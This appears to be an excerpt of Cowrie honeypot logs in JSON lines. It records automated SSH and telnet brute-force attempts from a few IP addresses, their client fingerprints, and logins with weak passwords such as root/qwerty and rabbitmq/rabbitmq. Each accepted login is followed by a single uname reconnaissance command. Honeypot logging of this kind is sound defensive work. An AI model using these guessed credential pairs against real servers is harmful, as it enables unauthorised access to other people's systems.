{"eventid":"cowrie.session.closed","duration":32.26196646690369,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:41.972270Z","src_ip":"212.227.235.229","session":"6278577ae1ab"}
{"eventid":"cowrie.session.closed","duration":34.28107237815857,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:42.021244Z","src_ip":"8.222.212.69","session":"bcf15187325b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":38028,"dst_ip":"1.2.3.4","dst_port":23,"session":"fca0ead3b5df","protocol":"telnet","message":"New connection: 8.222.212.69:38028 (1.2.3.4:23) [session: fca0ead3b5df]","sensor":"my-vps","timestamp":"2025-08-28T06:11:42.468343Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58286,"dst_ip":"1.2.3.4","dst_port":22,"session":"35696fb52963","protocol":"ssh","message":"New connection: 212.227.235.229:58286 (1.2.3.4:22) [session: 35696fb52963]","sensor":"my-vps","timestamp":"2025-08-28T06:11:54.226149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:54.317410Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:54.489303Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44716,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e8c48110f8f","protocol":"ssh","message":"New connection: 212.227.125.160:44716 (1.2.3.4:22) [session: 6e8c48110f8f]","sensor":"my-vps","timestamp":"2025-08-28T06:11:54.964961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.018274Z","src_ip":"212.227.125.160","session":"6e8c48110f8f"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.051448Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":34242,"dst_ip":"1.2.3.4","dst_port":23,"session":"8065bf3464da","protocol":"telnet","message":"New connection: 8.222.212.69:34242 (1.2.3.4:23) [session: 8065bf3464da]","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.108859Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.172527Z","src_ip":"212.227.125.160","session":"6e8c48110f8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:11:55.471228Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.471913Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.580097Z","src_ip":"212.227.125.160","session":"6e8c48110f8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.618035Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:55.619144Z","src_ip":"212.227.235.229","session":"35696fb52963"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:56.704973Z","src_ip":"212.227.125.160","session":"6e8c48110f8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55066,"dst_ip":"1.2.3.4","dst_port":22,"session":"99aa27c65992","protocol":"ssh","message":"New connection: 212.227.235.229:55066 (1.2.3.4:22) [session: 99aa27c65992]","sensor":"my-vps","timestamp":"2025-08-28T06:12:02.283163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:02.283862Z","src_ip":"212.227.235.229","session":"99aa27c65992"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:02.428099Z","src_ip":"212.227.235.229","session":"99aa27c65992"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T06:12:02.862650Z","src_ip":"212.227.235.229","session":"99aa27c65992"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:04.009096Z","src_ip":"212.227.235.229","session":"99aa27c65992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44266,"dst_ip":"1.2.3.4","dst_port":23,"session":"8eefe79af653","protocol":"telnet","message":"New connection: 212.227.235.229:44266 (1.2.3.4:23) [session: 8eefe79af653]","sensor":"my-vps","timestamp":"2025-08-28T06:12:06.362015Z"}
{"eventid":"cowrie.session.closed","duration":32.78174614906311,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:07.149418Z","src_ip":"212.227.235.229","session":"33f431e3e2ed"}
{"eventid":"cowrie.session.closed","duration":30.925100326538086,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:13.393355Z","src_ip":"8.222.212.69","session":"fca0ead3b5df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51800,"dst_ip":"1.2.3.4","dst_port":22,"session":"24f2b6de4a56","protocol":"ssh","message":"New connection: 212.227.235.229:51800 (1.2.3.4:22) [session: 24f2b6de4a56]","sensor":"my-vps","timestamp":"2025-08-28T06:12:24.179449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:24.180634Z","src_ip":"212.227.235.229","session":"24f2b6de4a56"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:24.325992Z","src_ip":"212.227.235.229","session":"24f2b6de4a56"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T06:12:24.794814Z","src_ip":"212.227.235.229","session":"24f2b6de4a56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36920,"dst_ip":"1.2.3.4","dst_port":22,"session":"d93bb86f24d8","protocol":"ssh","message":"New connection: 212.227.125.160:36920 (1.2.3.4:22) [session: d93bb86f24d8]","sensor":"my-vps","timestamp":"2025-08-28T06:12:25.392117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:25.473717Z","src_ip":"212.227.125.160","session":"d93bb86f24d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:25.616702Z","src_ip":"212.227.125.160","session":"d93bb86f24d8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:25.942770Z","src_ip":"212.227.235.229","session":"24f2b6de4a56"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T06:12:25.976228Z","src_ip":"212.227.125.160","session":"d93bb86f24d8"}
{"eventid":"cowrie.session.closed","duration":31.838231563568115,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:26.947014Z","src_ip":"8.222.212.69","session":"8065bf3464da"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:27.082606Z","src_ip":"212.227.125.160","session":"d93bb86f24d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49156,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2ca2a965b8f","protocol":"ssh","message":"New connection: 212.227.235.229:49156 (1.2.3.4:22) [session: f2ca2a965b8f]","sensor":"my-vps","timestamp":"2025-08-28T06:12:32.157084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:32.157954Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:32.300991Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:12:32.734841Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:12:33.107707Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:12:33.108570Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:33.253087Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:33.254563Z","src_ip":"212.227.235.229","session":"f2ca2a965b8f"}
{"eventid":"cowrie.session.closed","duration":31.54277205467224,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:37.904711Z","src_ip":"212.227.235.229","session":"8eefe79af653"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45910,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3728715295a","protocol":"ssh","message":"New connection: 212.227.125.160:45910 (1.2.3.4:22) [session: c3728715295a]","sensor":"my-vps","timestamp":"2025-08-28T06:12:39.983915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:39.985003Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.089794Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.415788Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:12:40.643737Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.644392Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41808,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4ae4a11d0f6","protocol":"ssh","message":"New connection: 212.227.125.160:41808 (1.2.3.4:22) [session: b4ae4a11d0f6]","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.686185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.687046Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.session.closed","duration":120.00103187561035,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.746426Z","src_ip":"212.227.125.160","session":"e5f440d6fcba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.753821Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.754711Z","src_ip":"212.227.125.160","session":"c3728715295a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:12:40.831837Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:12:41.323330Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:12:41.572112Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:12:41.572866Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
